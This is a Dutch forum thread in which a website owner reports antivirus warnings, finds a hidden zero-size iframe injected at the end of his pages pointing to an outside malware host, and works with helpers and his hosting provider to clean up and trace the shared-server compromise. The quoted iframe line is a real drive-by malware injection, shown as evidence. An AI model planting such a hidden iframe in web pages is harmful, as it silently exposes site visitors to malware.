Melding van virus bij bezoek aan site

Status
Niet open voor verdere reacties.
dit kan niet

dit kan niet

Gebruiker
Lid geworden
5 dec 2006
Berichten
80
Hallo,

Sinds een paar dagen krijg ik een melding van mijn virusscanner (nod32) bij het bezoeken van mijn site, waarvan ik de link maar ven niet in dit bericht plaats.
er wil een pdf geopend worden en komt een melding trojaans paard.
Nu had ik gezien dat er onderaan de pagina's (in de bron) een extra regel is toegevoegd (door iemand?),
Code: 
</div>
</body></html><iframe src="http://rokobon.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Mijn vraag:
Hoe komt dit erin? En hoe kan ik dit in de toekomst voorkomen? Ik denk dat ik alle pagina's opnieuw moet uploaden?

Gr,
 
Je site is gekraakt. Hier kun je lezen wat je daaraan moet doen:
http://www.helpmij.nl/forum/showthread.php?t=498941
Daar is sprake van 'n verborgen <li>, bij jou van de iets gebruikelijker <iframe>, ook verborgen. In jouw geval zou ik er echt heel snel iets aan doen, want via jouw site wordt actief geprobeerd malware te installeren. Vandaar de melding die je krijgt. Dat overkomt je bezoekers dus ook!
In die andere draad gaat 't mogelijk om spam of zo, bij jou is 't serieuzer, maar wat je moet doen is hetzelfde.
 
Ik heb alle pagina's opnieuw geupload. Dus echt alle html pagina's, want ook de html pagina's die men niet via een link kan bekijken (die dus niet toegankelijk zijn voor het gewone publiek,,,) stond die regel in. Vandaar dat ik al dacht dat er iets niet juist moest zijn.
Gekraakt....
Maar goed alle pagina's opnieuw erop gezet. Had ik al gedaan, voordat ik je bericht had gelezen. Maar had wel mijn virusscanner een diepe scan laten doen.
Nadat ik jou bericht had gelezen, heb ik de online scanner van bitdefender gedaan en deze vond ook geen infectie.
Tevens heb ik het wachtwoord aangepast en de optie van Firefox om het wachtwoord op te slaan uitgeschakeld. Of was dat niet nodig?

EDIT:

Ik ben aan het googlen geweest naar dat domeinnaam waarnaar gelinkt werd.
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=rokobon.com

EN deze dan: http://blog.irrelevant.com/ hetzelfde probleem (hier wordt verteld dat het iets met de server te maken heeft) Dus zouden er wellicht meer sites op dezelfde server er last van moeten hebben.

gr
 
Laatst bewerkt:
Firefox (en FileZilla en ...) schijnen hun wachtwoorden niet echt 100% waterdicht op te slaan. Maar in principe, als je computer geen trojaan of zo bevat, kan daar verder weinig mee gebeuren. Tenzij er natuurlijk iemand achter je toetsenbord gaat zitten, maar dan werkt eigenlijk geen enkele beveiliging meer.
Ik zou 't voor de zekerheid even uit laten staan, tot je site 'n aantal weken schoon blijft. Je weet maar nooit of niet een of andere extensie iets vreemds doet of zo.

Het meest waarschijnlijke is dat je wachtwoord op een of andere manier in handen van iemand is gekomen. Dat kan op allerlei manieren, meest waarschijnlijke is 'n trojaan of zo in je computer.
Ik zou online door minimaal twee scanners laten scannen, voor de zekerheid.

Vervelend als je geen malware vindt, want dan zou het dus ook ergens anders vandaan kunnen komen. Ik bedoel: als je 'n pracht van 'n trojaan vindt met als naam find-the-hidden-password, dan is 't gelijk duidelijk...
Heb je je host al 'n berichtje gestuurd? Soms kan 'n server ook worden gekraakt omdat een van de andere klanten te stom of te lui is geweest om 'n cms of zo fatsoenlijk te updaten. Het is dus echt belangrijk dat je 't ook aan je host meldt!
Zeker als je geen malware op je eigen computer vindt.

Als je geluk hebt is het lek al gedicht, omdat een van de anderen met wie je 'n server deelt al iets heeft gedaan of zo.
Veel meer dan wat je nu hebt gedaan kun je niet doen. Behalve dus je host waarschuwen. En je site goed in de gaten houden de komende tijd.

Firefox heeft 'n handige extensie, Link and Forminfo:
https://addons.mozilla.org/en-US/firefox/addon/6939
Als je dan pagina-info opvraagt (bij mij is dat Extra->Pagina-Info, of rechtsklikken, maar het wil geloof ik nog wel 'ns verhuizen van menu...) kun je in een keer alle links naar buiten zien. Erg handig bij dit soort verborgen troep, spaart 'n hoop zoekwerk uit.
 
zelfde probleem: http://blog.irrelevant.com/
Het zou een server probleem zijn, voor zover mijn Engels reikt.
Meerdere sites op dezelfde server die besmet zijn?

En ja ik heb een mailtje gestuurd naar de hosting provider.
 
Als die site op dezelfde server wordt gehost, lijkt 't 'n server-probleem. Overigens zijn er ongelooflijk veel sites waarnaar gelinkt kan worden.
Eventueel kun je hier zien welke sites er nog meer op dezelfde server als de jouw worden gehost, en of die ook die code hebben:
http://www.axandra.com/free-online-seo-tool/shared-hosting-check.php
Uit dat stukje blijkt trouwens ook duidelijk waarom 't belangrijk is even de host te informeren.

Edit: misschien las ik je bericht even verkeerd. 't Kán 'n serverside probleem zijn, als de host is gekraakt. Door 'n fout van de host zelf of door 'n klant die 'n ingang biedt via 'n verouderd cms of zo. Maar 't kan ook alleen bij jouw site spelen. Als 't met gebruik van jouw wachtwoord voor de site is geplaatst, dan is 't niet 't probleem van de server, maar van jou. Enfin, dat kan de host snel genoeg zien in de logs en zo.
 
Laatst bewerkt:
De link die ik gaf, heeft iemand zijn probleem beschreven in een blog. Hier stond in dat het een server probleem zou zijn.
De link die je gaf geeft aan dat er 0 domeinen op dezelfde server zitten.
Deze link komt met 204 domeinen op dezelfde server.

Ik heb ze natuurlijk niet allemaal gecheckt, maar ik heb er enkele gevonden, met precies dezelfde zin op de hoofdpagina. Of iets anders, maar ik heb enkel gezocht naar een link naar "rokobon".

Ik hoop dat men iets met mijn mailtje zal doen. Wat kan ik anders? Het is een betaalde host, dus dan mag ik er wel iets voor terug verwachten.

EDIT:
In mijn zoektocht (naar andere website op dezelfde server) ben ik nu op een website gestuit die als aanvalsite staat gerapporteerd. Waarom werd deze pagina als aanvalsite geraporteerd? Zie dit: http://safebrowsing.clients.google....efox&hl=nl&site=http://www.erikwiltenburg.nl/
 
Laatst bewerkt:
Dan lijkt het erop dat het probleem is ontstaan via je host. LIJKT, voor ik 'n woeste host op m'n dak krijg :D In principe kun jij natuurlijk ook het lek zijn via wie de rest is besmet.
Je host heeft er alle belang bij om als de bliksem de oorzaak te vinden, omdat ze anders niet lang klanten zullen hebben.
Dat er zoiets gebeurt, tja, dat kan gebeuren. Iedereen maakt fouten. Of het is nog niet eens 'n fout, maar 'n nog niet bekende exploit waar dus ook nog een update voor is.
De reactie van je host is wel belangrijk, daar kun je ze op beoordelen. Als ze als de bliksem aan de slag gaan en zo, prima. Anders zou ik 'n andere overwegen. Maar normaal genomen zullen ze snel reageren, anders kunnen ze de tent wel sluiten.

Hmmm, bij mij werkt m'n eigen link niet en die van jou ook niet. Ik ga de jouwe erbij zetten op m'n pagina met links, want kennelijk werken deze diensten niet altijd waterdicht.
 
Idem last van.
En heel veel sites.................

Kreeg dit terug van mijn Host:
========================================
Waarschijnlijk is uw computer (of een computer met daarop de FTP-gegevens opgeslagen) besmet met een virus en is op die manier uw FTP-wachtwoord bekend geworden. Vermoedelijk Gumblar, of een soort gelijk virus:

http://blog.vevida.com/index.php/2009/06/gumblar-virus-op-tienduizenden-websites-actief/
http://blog.vevida.com/index.php/20...ormvirus-valt-microsoft-windows-systemen-aan/

Deze virussen zijn in staat om FTP wachtwoorden op te zoeken, om zich dan via websites te verspreiden. Meer informatie kunt u ook vinden op:

http://security.nl/zoeken?search=gumblar
http://security.nl/artikel/31310/1/Hackers_verstoppen_iFrames_op_nieuwe_manier.html
http://mediumcube.com/mctalk/tag/ftp-password-hack/
http://www.merit.edu/mail.archives/nanog/msg17151.html
http://www.vevida.com/NL/service_onderwerp.asp?owid=226
http://www.vevida.com/NL/service_onderwerp.asp?owid=266
http://saotn.nl/2009/03/22/wachtwoorden/

Het is daarom erg belangrijk dat u uw computer(s) scant met een nieuwe virusscanner. Virussen kunnen al geïnstalleerde scanners onklaar maken, waardoor deze niet goed meer functioneren en het lijkt als of er geen malware aanwezig is.

Downloadt u bijvoorbeeld AVG van http://free.avg.com (gratis) of ClamWin van http://nl.clamwin.com/ (gratis). Na download en installatie moeten de virusdefinities bijgewerkt worden. Het daadwerkelijk scannen doet u het beste offline; de computer niet verbonden met internet. En eventueel in de "veilige modus" van Windows.
Ook MRT (Malicious Software Removal Tool) kan hiervoor gebruikt worden:
http://support.microsoft.com/kb/890830.

Let wel: Het scannen met een virusscanner heeft geen nut als u niet bij bent met de alle Windows- en Adobe (Acrobat/Flash) updates.
=========================================
 
Ja, je wordt er ...ziek van. Persoonlijk geef ik wel de voorkeur aan 'n online-scan (als je zo'n site nog kan bereiken).
Bij dit kan niet zou 't via z'n host gegaan kunnen zijn, omdat hij kennelijk geen malware heeft en er kennelijk meerdere sites op dezelfde server zijn besmet.
Even afwachten maar. Ik weet niet hoe groot of klein die hoster is en of ze 's nachts werken, maar morgenochtend zou er wel 'n reactie moeten zijn, lijkt mij. Althans: dat zou ik van mijn hoster toch wel eisen/verwachten.
 
Hallo,

Ik toch nog mijn comp gescand met een andere virusscanner (wat een gedoe, trouwens) en deze vond enkele cookies verdacht. Zijn cookies een bedreiging?
Verder niets verdachts gevonden. En nog geen reactie van de hostingprovider, weet niet of ze zaterdag werken...
 
Nee, cookies zijn in dit verband op geen enkele manier 'n bedreiging. Cookies kunnen alleen 'n probleem zijn wat betreft de privacy, omdat ze info kunnen geven over sites die je hebt bezocht e.d. (tracking cookies). Veel scanners waarschuwen ook voor cookies van bedrijven die dat soort cookies plaatsen.
Tja, even wachten dan maar op je hoster. 'n Kleine hoster (als het dat is) heeft voor- en nadelen, zullen we maar zeggen.
 
Hallo,

Nou zie ik net dat er in mijn spambox van gmail een bericht zat van mijn hosting provider van datum 27 januari 2010.
Code: 
Geachte klant,

Zoals u misschien afgelopen dagen gemerkt heeft, zijn er aan alle index files die op uw account staan regels toegevoegd (iframe). Door deze regel krijgen bezoekers vaak de melding dat de site een virus bevat.

De oorzaak van deze problemen ligt bij één of meerdere van de domeinnamen die op deze server wordt gehost. Aangezien er ongeveer 250 domeinnamen draaien, is het lastig om er achter te komen welke domeinnaam de boosdoener is. De betreffende klant heeft waarschijnlijk een verouderde versie van bijvoorbeeld Joomla, Wordpress of Oscommerce draaien. Om hier toch achter te komen zullen we per direct Mod_security activeren op de server. Dit kan tot gevolg hebben dat sommige scripts die onveilige commando's gebruiken niet meer (volledig) werken. Maar dit zal waarschijnlijk wel snel duidelijkheid geven in de logs welke domeinnaam onveilig is. Helaas is er voor ons op dit moment geen andere oplossing om dit probleem in de toekomst te voorkomen.

Wij vragen u al uw installties van Joomla, Wordpress of Oscommerce etc, te updaten naar de laatste versie!

Mocht u problemen ondervinden met uw website door Mod_security(bijv. HTTP 500), zorg er dan aub voor dat u van de opensource scripts die u heeft draaien de laatste versie is geinstalleerd. We zullen dan zsm de site's handmatig over zetten op een andere server zonder mod_security (indien alles up to date en veilig is!).

Onze excuses voor het ongemak.

Met vriendelijke groet,

KeurigOnline.nl

Dus zij waren er eerder bij, dan dat ik het in de gaten had... Ik had het immers gisteren pas in de gaten. 29 januari
 
Nou, dat lijkt me 'n keurige reactie. En 't is dus inderdaad iets van een van de andere klanten. Gelukkig heb je 't opgeschoond voor je op allerlei zwarte lijsten en zo komt te staan (neem ik aan).
 
Status
Niet open voor verdere reacties.
Steun Ons

Nieuwste berichten

Terug
Bovenaan Onderaan